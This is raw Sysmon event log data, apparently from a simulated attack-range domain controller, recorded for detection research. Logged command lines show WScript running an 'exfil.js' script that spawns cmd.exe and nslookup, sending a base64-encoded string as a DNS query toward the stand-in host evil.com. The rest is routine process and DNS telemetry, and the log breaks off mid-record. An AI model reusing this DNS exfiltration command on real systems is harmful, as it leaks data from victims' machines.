14:21:31.280{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.280{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.279{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.279{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9243-000000005F02}3348C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.279{2E1864BB-18EB-629A-9043-000000005F02}53927376C:\Windows\system32\cmd.exe{2E1864BB-18EB-629A-9243-000000005F02}3348C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.279{2E1864BB-18EB-629A-9243-000000005F02}3348C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EB-629A-9043-000000005F02}5392C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaxq.tmp 2>&1 10341000x8000000000000000208830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.243{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-9143-000000005F02}5084C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.243{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-9143-000000005F02}5084C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.243{2E1864BB-18EB-629A-9143-000000005F02}50841800C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-9043-000000005F02}5392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.227{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9143-000000005F02}5084C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.227{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.227{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.227{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.227{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.227{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-9043-000000005F02}5392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.227{2E1864BB-18E0-629A-6742-000000005F02}39762620C:\Windows\System32\WScript.exe{2E1864BB-18EB-629A-9043-000000005F02}5392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.234{2E1864BB-18EB-629A-9043-000000005F02}5392C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaxq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.227{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltqrxrv.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000208818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.760{00000000-0000-0000-0000-000000000000}7536<unknown process>-udpfalsefalse127.0.0.1-50660-false127.0.0.1-53domain 354300x8000000000000000208817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.760{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50660- 354300x8000000000000000208816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.760{00000000-0000-0000-0000-000000000000}7536<unknown process>-udptruefalse127.0.0.1-50660-false127.0.0.1-53domain 354300x8000000000000000208815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.760{00000000-0000-0000-0000-000000000000}7536<unknown process>-udpfalsefalse127.0.0.1-50659-false127.0.0.1-53domain 354300x8000000000000000208814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.760{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50659- 354300x8000000000000000208813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.760{00000000-0000-0000-0000-000000000000}7536<unknown process>-udptruefalse127.0.0.1-50659-false127.0.0.1-53domain 354300x8000000000000000208812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.760{00000000-0000-0000-0000-000000000000}7536<unknown process>-udpfalsefalse127.0.0.1-50658-false127.0.0.1-53domain 354300x8000000000000000208811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.760{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50658- 354300x8000000000000000208810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.759{00000000-0000-0000-0000-000000000000}7536<unknown process>-udptruefalse127.0.0.1-50658-false127.0.0.1-53domain 354300x8000000000000000208809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.641{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50657- 354300x8000000000000000208808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.640{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50656- 354300x8000000000000000208807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.637{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50655- 354300x8000000000000000208806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.637{00000000-0000-0000-0000-000000000000}4012<unknown process>-udptruefalse127.0.0.1-50655-false127.0.0.1-53domain 354300x8000000000000000208805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.548{00000000-0000-0000-0000-000000000000}1700<unknown process>-udpfalsefalse127.0.0.1-50654-false127.0.0.1-53domain 354300x8000000000000000208804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.548{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50654- 354300x8000000000000000208803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.548{00000000-0000-0000-0000-000000000000}1700<unknown process>-udptruefalse127.0.0.1-50654-false127.0.0.1-53domain 354300x8000000000000000208802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.468{00000000-0000-0000-0000-000000000000}7224<unknown process>-udpfalsefalse127.0.0.1-50653-false127.0.0.1-53domain 354300x8000000000000000208801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.468{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50653- 354300x8000000000000000208800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.468{00000000-0000-0000-0000-000000000000}7224<unknown process>-udptruefalse127.0.0.1-50653-false127.0.0.1-53domain 354300x8000000000000000208799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.468{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50652- 354300x8000000000000000208798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.468{00000000-0000-0000-0000-000000000000}7224<unknown process>-udptruefalse127.0.0.1-50652-false127.0.0.1-53domain 354300x8000000000000000208797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.467{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50651- 354300x8000000000000000208796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.467{00000000-0000-0000-0000-000000000000}7224<unknown process>-udptruefalse127.0.0.1-50651-false127.0.0.1-53domain 354300x8000000000000000208795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.399{00000000-0000-0000-0000-000000000000}5968<unknown process>-udpfalsefalse127.0.0.1-50650-false127.0.0.1-53domain 354300x8000000000000000208794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.399{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50650- 354300x8000000000000000208793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.399{00000000-0000-0000-0000-000000000000}5968<unknown process>-udptruefalse127.0.0.1-50650-false127.0.0.1-53domain 354300x8000000000000000208792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.399{00000000-0000-0000-0000-000000000000}5968<unknown process>-udpfalsefalse127.0.0.1-50649-false127.0.0.1-53domain 354300x8000000000000000208791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.399{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50649- 354300x8000000000000000208790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.399{00000000-0000-0000-0000-000000000000}5968<unknown process>-udptruefalse127.0.0.1-50649-false127.0.0.1-53domain 354300x8000000000000000208789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.399{00000000-0000-0000-0000-000000000000}5968<unknown process>-udpfalsefalse127.0.0.1-50648-false127.0.0.1-53domain 354300x8000000000000000208788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.398{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50648- 354300x8000000000000000208787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.398{00000000-0000-0000-0000-000000000000}5968<unknown process>-udptruefalse127.0.0.1-50648-false127.0.0.1-53domain 354300x8000000000000000208786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.319{00000000-0000-0000-0000-000000000000}2260<unknown process>-udpfalsefalse127.0.0.1-50647-false127.0.0.1-53domain 354300x8000000000000000208785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.319{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50647- 354300x8000000000000000208784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.319{00000000-0000-0000-0000-000000000000}2260<unknown process>-udptruefalse127.0.0.1-50647-false127.0.0.1-53domain 354300x8000000000000000208783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.319{00000000-0000-0000-0000-000000000000}2260<unknown process>-udpfalsefalse127.0.0.1-50646-false127.0.0.1-53domain 354300x8000000000000000208782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.319{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50646- 354300x8000000000000000208781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.319{00000000-0000-0000-0000-000000000000}2260<unknown process>-udptruefalse127.0.0.1-50646-false127.0.0.1-53domain 354300x8000000000000000208780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.319{00000000-0000-0000-0000-000000000000}2260<unknown process>-udpfalsefalse127.0.0.1-50645-false127.0.0.1-53domain 354300x8000000000000000208779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.319{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50645- 354300x8000000000000000208778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.318{00000000-0000-0000-0000-000000000000}2260<unknown process>-udptruefalse127.0.0.1-50645-false127.0.0.1-53domain 354300x8000000000000000208777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.253{00000000-0000-0000-0000-000000000000}4596<unknown process>-udpfalsefalse127.0.0.1-50644-false127.0.0.1-53domain 354300x8000000000000000208776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.253{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50644- 354300x8000000000000000208775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.253{00000000-0000-0000-0000-000000000000}4596<unknown process>-udptruefalse127.0.0.1-50644-false127.0.0.1-53domain 354300x8000000000000000208774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.253{00000000-0000-0000-0000-000000000000}4596<unknown process>-udpfalsefalse127.0.0.1-50643-false127.0.0.1-53domain 354300x8000000000000000208773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.253{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50643- 354300x8000000000000000208772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.253{00000000-0000-0000-0000-000000000000}4596<unknown 